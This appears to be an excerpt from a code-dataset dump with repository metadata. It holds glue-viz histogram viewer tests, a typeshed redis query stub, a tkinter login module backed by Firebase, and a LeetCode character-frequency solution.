# Check the actual values of the histograms
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
# Numerical attribute
viewer_state.hist_x_min = -5
viewer_state.hist_x_max = 5
viewer_state.hist_n_bin = 4
assert_allclose(self.viewer.state.y_max, 2.4)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 1, 2, 1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 1', cid < 2)
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 1, 1, 0])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.normalize = True
assert_allclose(self.viewer.state.y_max, 0.24)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0.1, 0.2, 0.1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 0.2, 0.2, 0])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.cumulative = True
assert_allclose(self.viewer.state.y_max, 1.2)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0.25, 0.75, 1.0])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 0.5, 1.0, 1.0])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.normalize = False
assert_allclose(self.viewer.state.y_max, 4.8)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 1, 3, 4])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 1, 2, 2])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.cumulative = False
# Categorical attribute
viewer_state.x_att = self.data.id['y']
formatter = self.viewer.axes.xaxis.get_major_formatter()
xlabels = [formatter.format_data(pos) for pos in range(3)]
assert xlabels == ['a', 'b', 'c']
assert_allclose(self.viewer.state.y_max, 2.4)
assert_allclose(self.viewer.layers[0].mpl_hist, [2, 1, 1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [1, 0, 1])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
viewer_state.normalize = True
assert_allclose(self.viewer.state.y_max, 0.6)
assert_allclose(self.viewer.layers[0].mpl_hist, [0.5, 0.25, 0.25])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0.5, 0, 0.5])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
viewer_state.cumulative = True
assert_allclose(self.viewer.state.y_max, 1.2)
assert_allclose(self.viewer.layers[0].mpl_hist, [0.5, 0.75, 1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0.5, 0.5, 1])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
viewer_state.normalize = False
assert_allclose(self.viewer.state.y_max, 4.8)
assert_allclose(self.viewer.layers[0].mpl_hist, [2, 3, 4])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [1, 1, 2])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
# TODO: add tests for log
def test_apply_roi(self):
# Check that when doing an ROI selection, the ROI clips to the bin edges
# outside the selection
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
viewer_state.hist_x_min = -5
viewer_state.hist_x_max = 5
viewer_state.hist_n_bin = 4
roi = XRangeROI(-0.2, 0.1)
assert len(self.viewer.layers) == 1
self.viewer.apply_roi(roi)
assert len(self.viewer.layers) == 2
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 1, 2, 1])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 1, 2, 0])
assert_allclose(self.data.subsets[0].to_mask(), [0, 1, 1, 1])
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == -2.5
assert state.hi == 2.5
# TODO: add a similar test in log space
def test_apply_roi_categorical(self):
# Check that when doing an ROI selection, the ROI clips to the bin edges
# outside the selection
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
viewer_state.x_att = self.data.id['y']
roi = XRangeROI(0.3, 0.9)
assert len(self.viewer.layers) == 1
self.viewer.apply_roi(roi)
assert len(self.viewer.layers) == 2
assert_allclose(self.viewer.layers[0].mpl_hist, [2, 1, 1])
assert_allclose(self.viewer.layers[1].mpl_hist, [2, 1, 0])
assert_allclose(self.data.subsets[0].to_mask(), [1, 1, 0, 1])
state = self.data.subsets[0].subset_state
assert isinstance(state, CategoricalROISubsetState)
assert_equal(state.roi.categories, ['a', 'b'])
def test_apply_roi_empty(self):
# Make sure that doing an ROI selection on an empty viewer doesn't
# produce error messsages
roi = XRangeROI(-0.2, 0.1)
self.viewer.apply_roi(roi)
def test_axes_labels(self):
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
assert self.viewer.axes.get_xlabel() == 'x'
assert self.viewer.axes.get_ylabel() == 'Number'
viewer_state.x_log = True
assert self.viewer.axes.get_xlabel() == 'Log x'
assert self.viewer.axes.get_ylabel() == 'Number'
viewer_state.x_att = self.data.id['y']
assert self.viewer.axes.get_xlabel() == 'y'
assert self.viewer.axes.get_ylabel() == 'Number'
viewer_state.normalize = True
assert self.viewer.axes.get_xlabel() == 'y'
assert self.viewer.axes.get_ylabel() == 'Normalized number'
viewer_state.normalize = False
viewer_state.cumulative = True
assert self.viewer.axes.get_xlabel() == 'y'
assert self.viewer.axes.get_ylabel() == 'Number'
def test_y_min_y_max(self):
# Regression test for a bug that caused y_max to not be set correctly
# when multiple subsets were present and after turning on normalization
# after switching to a different attribute from that used to make the
# selection.
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
self.data.add_component([3.4, 3.5, 10.2, 20.3], 'z')
viewer_state.x_att = self.data.id['x']
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 1', cid < 1)
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 2', cid < 2)
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 3', cid < 3)
assert_allclose(self.viewer.state.y_min, 0)
assert_allclose(self.viewer.state.y_max, 1.2)
viewer_state.x_att = self.data.id['z']
assert_allclose(self.viewer.state.y_min, 0)
assert_allclose(self.viewer.state.y_max, 2.4)
viewer_state.normalize = True
assert_allclose(self.viewer.state.y_min, 0)
assert_allclose(self.viewer.state.y_max, 0.5325443786982249)
def test_update_when_limits_unchanged(self):
# Regression test for glue-viz/glue#1010 - this bug caused histograms
# to not be recomputed if the attribute changed but the limits and
# number of bins did not.
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
viewer_state.x_att = self.data.id['y']
viewer_state.hist_x_min = -10
viewer_state.hist_x_max = +10
viewer_state.hist_n_bin = 5
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 3, 1, 0])
viewer_state.x_att = self.data.id['x']
viewer_state.hist_x_min = -10
viewer_state.hist_x_max = +10
viewer_state.hist_n_bin = 5
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 2, 2, 0])
viewer_state.x_att = self.data.id['y']
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 3, 1, 0])
viewer_state.x_att = self.data.id['x']
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 2, 2, 0])
def test_component_replaced(self):
# regression test for 508 - if a component ID is replaced, we should
# make sure that the component ID is selected if the old component ID
# was selected
self.viewer.add_data(self.data)
self.viewer.state.x_att = self.data.components[0]
test = ComponentID('test')
self.data.update_id(self.viewer.state.x_att, test)
assert self.viewer.state.x_att is test
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:test:y:Coordinate components:Pixel Axis 0 [x]:World 0'
def test_nbin_override_persists_over_numerical_attribute_change(self):
# regression test for #398
self.data.add_component([3, 4, 1, 2], 'z')
self.viewer.add_data(self.data)
self.viewer.state.x_att = self.data.id['x']
self.viewer.state.hist_n_bin = 7
self.viewer.state.x_att = self.data.id['z']
assert self.viewer.state.hist_n_bin == 7
@pytest.mark.parametrize('protocol', [0, 1])
def test_session_back_compat(self, protocol):
filename = os.path.join(DATA, 'histogram_v{0}.glu'.format(protocol))
with open(filename, 'r') as f:
session = f.read()
state = GlueUnSerializer.loads(session)
ga = state.object('__main__')
dc = ga.session.data_collection
assert len(dc) == 1
assert dc[0].label == 'data'
viewer1 = ga.viewers[0][0]
assert len(viewer1.state.layers) == 2
assert viewer1.state.x_att is dc[0].id['a']
assert_allclose(viewer1.state.x_min, 0)
assert_allclose(viewer1.state.x_max, 9)
assert_allclose(viewer1.state.y_min, 0)
assert_allclose(viewer1.state.y_max, 2.4)
assert_allclose(viewer1.state.hist_x_min, 0)
assert_allclose(viewer1.state.hist_x_max, 9)
assert_allclose(viewer1.state.hist_n_bin, 6)
assert not viewer1.state.x_log
assert not viewer1.state.y_log
assert viewer1.state.layers[0].visible
assert not viewer1.state.layers[1].visible
assert not viewer1.state.cumulative
assert not viewer1.state.normalize
viewer2 = ga.viewers[0][1]
assert viewer2.state.x_att is dc[0].id['b']
assert_allclose(viewer2.state.x_min, 2)
assert_allclose(viewer2.state.x_max, 16)
assert_allclose(viewer2.state.y_min, 0)
assert_allclose(viewer2.state.y_max, 1.2)
assert_allclose(viewer2.state.hist_x_min, 2)
assert_allclose(viewer2.state.hist_x_max, 16)
assert_allclose(viewer2.state.hist_n_bin, 8)
assert not viewer2.state.x_log
assert not viewer2.state.y_log
assert viewer2.state.layers[0].visible
assert viewer2.state.layers[1].visible
assert not viewer2.state.cumulative
assert not viewer2.state.normalize
viewer3 = ga.viewers[0][2]
assert viewer3.state.x_att is dc[0].id['a']
assert_allclose(viewer3.state.x_min, 0)
assert_allclose(viewer3.state.x_max, 9)
assert_allclose(viewer3.state.y_min, 0.01111111111111111)
assert_allclose(viewer3.state.y_max, 0.7407407407407407)
assert_allclose(viewer3.state.hist_x_min, 0)
assert_allclose(viewer3.state.hist_x_max, 9)
assert_allclose(viewer3.state.hist_n_bin, 10)
assert not viewer3.state.x_log
assert viewer3.state.y_log
assert viewer3.state.layers[0].visible
assert viewer3.state.layers[1].visible
assert not viewer3.state.cumulative
assert viewer3.state.normalize
viewer4 = ga.viewers[0][3]
assert viewer4.state.x_att is dc[0].id['a']
assert_allclose(viewer4.state.x_min, -1)
assert_allclose(viewer4.state.x_max, 10)
assert_allclose(viewer4.state.y_min, 0)
assert_allclose(viewer4.state.y_max, 12)
assert_allclose(viewer4.state.hist_x_min, -1)
assert_allclose(viewer4.state.hist_x_max, 10)
assert_allclose(viewer4.state.hist_n_bin, 4)
assert not viewer4.state.x_log
assert not viewer4.state.y_log
assert viewer4.state.layers[0].visible
assert viewer4.state.layers[1].visible
assert viewer4.state.cumulative
assert not viewer4.state.normalize
def test_apply_roi_single(self):
# Regression test for a bug that caused mode.update to be called
# multiple times and resulted in all other viewers receiving many
# messages regarding subset updates (this occurred when multiple)
# datasets were present.
layer_tree = LayerTreeWidget()
layer_tree.set_checkable(False)
layer_tree.setup(self.data_collection)
layer_tree.bind_selection_to_edit_subset()
class Client(HubListener):
def __init__(self, *args, **kwargs):
super(Client, self).__init__(*args, **kwargs)
self.count = Counter()
def ping(self, message):
self.count[message.sender] += 1
def register_to_hub(self, hub):
hub.subscribe(self, SubsetUpdateMessage, handler=self.ping)
d1 = Data(a=[1, 2, 3], label='d1')
d2 = Data(b=[1, 2, 3], label='d2')
d3 = Data(c=[1, 2, 3], label='d3')
d4 = Data(d=[1, 2, 3], label='d4')
self.data_collection.append(d1)
self.data_collection.append(d2)
self.data_collection.append(d3)
self.data_collection.append(d4)
client = Client()
client.register_to_hub(self.hub)
self.viewer.add_data(d1)
self.viewer.add_data(d3)
roi = XRangeROI(2.5, 3.5)
self.viewer.apply_roi(roi)
for subset in client.count:
assert client.count[subset] == 1
| [
"thomas.robitaille@gmail.com"
] | thomas.robitaille@gmail.com |
a764645348053f284abb738a5febafeabb9cc262 | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/redis/redis/commands/search/query.pyi | eb1846bab957d9c44c9913f2791264cc54783e40 | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 1,654 | pyi | from _typeshed import Incomplete
from typing import Any
class Query:
def __init__(self, query_string) -> None: ...
def query_string(self): ...
def limit_ids(self, *ids): ...
def return_fields(self, *fields): ...
def return_field(self, field, as_field: Incomplete | None = None): ...
def summarize(
self,
fields: Incomplete | None = None,
context_len: Incomplete | None = None,
num_frags: Incomplete | None = None,
sep: Incomplete | None = None,
): ...
def highlight(self, fields: Incomplete | None = None, tags: Incomplete | None = None): ...
def language(self, language): ...
def slop(self, slop): ...
def in_order(self): ...
def scorer(self, scorer): ...
def get_args(self): ...
def paging(self, offset, num): ...
def verbatim(self): ...
def no_content(self): ...
def no_stopwords(self): ...
def with_payloads(self): ...
def with_scores(self): ...
def limit_fields(self, *fields): ...
def add_filter(self, flt): ...
def sort_by(self, field, asc: bool = True): ...
def expander(self, expander): ...
class Filter:
args: Any
def __init__(self, keyword, field, *args) -> None: ...
class NumericFilter(Filter):
INF: str
NEG_INF: str
def __init__(self, field, minval, maxval, minExclusive: bool = False, maxExclusive: bool = False) -> None: ...
class GeoFilter(Filter):
METERS: str
KILOMETERS: str
FEET: str
MILES: str
def __init__(self, field, lon, lat, radius, unit="km") -> None: ...
class SortbyField:
args: Any
def __init__(self, field, asc: bool = True) -> None: ...
| [
"noreply@github.com"
] | sobolevn.noreply@github.com |
db14263818ca2ec53409ec3e900b8bb1024d43c3 | 86a26119af259e3858cb5e57ea2e41e3b25c5fa7 | /Python Project/StockerLogin_support.py | e025cae333394920cf0640976bbfb93881497cb4 | [] | no_license | deshmukhshweta/project2 | 747ca7972a7bfdc4aed20dbb4ee3f6d2f009ca83 | 8bf07454d259456dc616e7283c266b35fe7b870d | refs/heads/master | 2020-04-19T09:57:05.541157 | 2019-01-29T09:27:01 | 2019-01-29T09:27:01 | 168,125,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.13
# In conjunction with Tcl version 8.6
# May 27, 2018 02:27:42 PM
import sys
from tkinter import messagebox
from firebase import firebase as fb
try:
from Tkinter import *
except ImportError:
from tkinter import *
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
def init(top, gui, *args, **kwargs):
global w, top_level, root
w = gui
top_level = top
root = top
def destroy_window():
# Function which closes the window.
global top_level
top_level.destroy()
top_level = None
import Stocker_Home
idno = ""
def Stocker_validation():
global idno
idno = w.Admin_username.get()
password = w.Admin_password.get()
if(idno == ""):
messagebox.showerror("Stocker Login","Please Enter Username")
else:
if(password == ""):
messagebox.showerror("Stocker Login","Please Enter Password")
else:
fire = fb.FirebaseApplication("https://python-project-2d5d6.firebaseio.com/merchant/employee/stocker",None)
result = fire.get("stocker", idno)
if result != None:
if result["password"] == password:
destroy_window()
Stocker_Home.vp_start_gui()
else:
messagebox.showerror("stocker login","Invalid Password")
else:
messagebox.showerror("stocker login","Invalid Idno")
return idno
def Stocker_Cancel():
destroy_window()
| [
"123deshmukhshweta@gmail.com"
] | 123deshmukhshweta@gmail.com |
95b1b870a5d43d004cda91f86fbfa2c7bf12bd8c | 9dee94907e6456a4af9855d358693923c17b4e0d | /0451_Sort_Characters_By_Frequency.py | 92254fbc5d08ee4386acef0c4237627f0dffc781 | [] | no_license | chien-wei/LeetCode | e215915a8103e56f182040dacc9fb0d6996c86ec | 0d6f414e7610fedb2ec4818ecf88d51aa69e1355 | refs/heads/master | 2021-05-13T14:48:22.891100 | 2019-08-20T05:52:59 | 2019-08-20T05:52:59 | 116,749,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | class Solution:
def frequencySort(self, s):
"""
:type s: str
:rtype: str
"""
res = ""
print(collections.Counter(s))
for c, i in collections.Counter(s).most_common():
res += c*i
return res | [
"chien-wei@outlook.com"
] | chien-wei@outlook.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.